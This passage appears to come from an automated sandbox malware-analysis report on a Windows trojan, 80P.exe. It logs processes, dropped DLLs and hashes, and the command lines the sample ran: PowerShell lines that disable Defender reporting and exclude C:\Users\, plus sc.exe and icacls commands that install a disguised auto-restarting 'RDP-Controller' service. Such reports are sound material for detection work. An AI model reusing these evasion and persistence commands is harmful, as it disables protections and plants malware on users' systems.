                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EB49EA7 strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,20_2_00007FFE0EB49EA7
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\bIMtvCd7
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EB53EA0_2_02EB53EA
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EA4B4A0_2_02EA4B4A
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EA5B3E0_2_02EA5B3E
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EA60CE0_2_02EA60CE
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EB701E0_2_02EB701E
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EBD1220_2_02EBD122
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EA7F2E0_2_02EA7F2E
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EA9CF60_2_02EA9CF6
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EACDA60_2_02EACDA6
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD7209820_2_00007FF6BFD72098
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD6C4C020_2_00007FF6BFD6C4C0
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0E1709C020_2_00007FFE0E1709C0
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EB525F020_2_00007FFE0EB525F0
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EBDF02020_2_00007FFE0EBDF020
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EC0EB4020_2_00007FFE0EC0EB40
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE1150A8B520_2_00007FFE1150A8B5
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE1150A55820_2_00007FFE1150A558
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE1150A78B20_2_00007FFE1150A78B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE1150A64320_2_00007FFE1150A643
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE1151071020_2_00007FFE11510710
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE1330CBC020_2_00007FFE1330CBC0
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116C09C031_2_00007FFE116C09C0
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE116F25F031_2_00007FFE116F25F0
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1171F02031_2_00007FFE1171F020
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1174EB4031_2_00007FFE1174EB40
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1177A8B531_2_00007FFE1177A8B5
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1177A55831_2_00007FFE1177A558
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1177A78B31_2_00007FFE1177A78B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1178071031_2_00007FFE11780710
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1177A64331_2_00007FFE1177A643
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll 5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll 64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                    Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11501292 appears 377 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE1330A202 appears 345 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE0E161292 appears 462 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE116B1292 appears 462 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE116E1292 appears 515 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF6BFD699E2 appears 303 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11771292 appears 377 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE0EB41292 appears 515 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11711292 appears 394 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE0EC02FD2 appears 387 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE0EBD1292 appears 394 times
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11742FD2 appears 387 times
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124
                    Source: samctl.dll.20.drStatic PE information: Number of sections : 11 > 10
                    Source: NCdDxWNe.20.drStatic PE information: Number of sections : 11 > 10
                    Source: wwgq2y6S.20.drStatic PE information: Number of sections : 11 > 10
                    Source: 6DPA479I.20.drStatic PE information: Number of sections : 11 > 10
                    Source: TzijR9kt.20.drStatic PE information: Number of sections : 11 > 10
                    Source: dwlmgr.dll.20.drStatic PE information: Number of sections : 11 > 10
                    Source: cnccli.dll.20.drStatic PE information: Number of sections : 11 > 10
                    Source: evtsrv.dll.20.drStatic PE information: Number of sections : 11 > 10
                    Source: prgmgr.dll.20.drStatic PE information: Number of sections : 11 > 10
                    Source: libi2p.dll.20.drStatic PE information: Number of sections : 11 > 10
                    Source: ia0qD2w9.20.drStatic PE information: Number of sections : 11 > 10
                    Source: I2Hoxnam.20.drStatic PE information: Number of sections : 11 > 10
                    Source: 9m9shiPj.20.drStatic PE information: Number of sections : 11 > 10
                    Source: termsrv32.dll.20.drStatic PE information: Number of sections : 11 > 10
                    Source: 80P.exeStatic PE information: Number of sections : 11 > 10
                    Source: rdpctl.dll.20.drStatic PE information: Number of sections : 11 > 10
                    Source: oWkqS6Ji.20.drStatic PE information: Number of sections : 11 > 10
                    Source: 80P.exe, 00000000.00000000.1678570967.0000000000EA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIntegrator.exe@ vs 80P.exe
                    Source: 80P.exe, 00000000.00000002.1682278178.0000000002D0C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs 80P.exe
                    Source: 80P.exe, 00000001.00000002.2934405882.0000000002E4C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs 80P.exe
                    Source: 80P.exeBinary or memory string: OriginalFilenameIntegrator.exe@ vs 80P.exe
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@43/69@4/64
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD613B9 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,20_2_00007FF6BFD613B9
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD68C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,20_2_00007FF6BFD68C4A
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD68C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,20_2_00007FF6BFD68C4A
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess4124
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5812:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2032:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2312:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
                    Source: C:\Users\user\Desktop\80P.exeFile created: C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.batJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat"
                    Source: 80P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\80P.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                    Source: C:\Windows\System32\WerFault.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile read: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini
                    Source: C:\Users\user\Desktop\80P.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 80P.exeVirustotal: Detection: 8%
                    Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
                    Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
                    Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
                    Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
                    Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
                    Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
                    Source: 80P.exeString found in binary or memory: gfx/loading.gif">
                    Source: 80P.exeString found in binary or memory: /gfx/loading.gif
                    Source: 80P.exeString found in binary or memory: gfx/loading.gif
                    Source: 80P.exeString found in binary or memory: Execute via &Default browser/Launch default browser and execute application.
                    Source: unknownProcess created: C:\Users\user\Desktop\80P.exe "C:\Users\user\Desktop\80P.exe"
                    Source: unknownProcess created: C:\Users\user\Desktop\80P.exe C:\Users\user\Desktop\80P.exe
                    Source: C:\Users\user\Desktop\80P.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                    Source: C:\Users\user\Desktop\80P.exeProcess created: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe"
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                    Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
                    Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232
                    Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                    Source: C:\Users\user\Desktop\80P.exeProcess created: C:\Users\user\Desktop\80P.exe C:\Users\user\Desktop\80P.exeJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat"Jump to behavior
                    Source: C:\Users\user\Desktop\80P.exeProcess created: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-ControllerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignoreJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-ControllerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.aclJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: d3d9.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: d3d9.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
